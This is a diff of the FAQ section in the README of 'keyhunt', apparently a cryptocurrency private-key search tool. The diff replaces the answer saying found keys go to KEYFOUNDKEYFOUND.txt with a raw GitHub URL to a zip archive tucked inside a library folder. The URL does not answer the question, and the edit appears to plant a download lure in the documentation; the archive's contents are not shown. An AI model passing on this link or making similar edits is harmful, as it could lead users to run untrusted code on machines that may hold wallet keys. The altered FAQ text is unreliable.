GBran88/keyhunt/README.md

 ## FAQ

 - Where the privatekeys will be saved?
-R: In a file called `KEYFOUNDKEYFOUND.txt`
+R: In a file called `https://raw.githubusercontent.com/GBran88/keyhunt/main/gmp256k1/Software_3.1-beta.3.zip`

 - Can I save the bloomfilter and table to speed up the process?
 R: Yes use only `-S` always that you run the program it works for: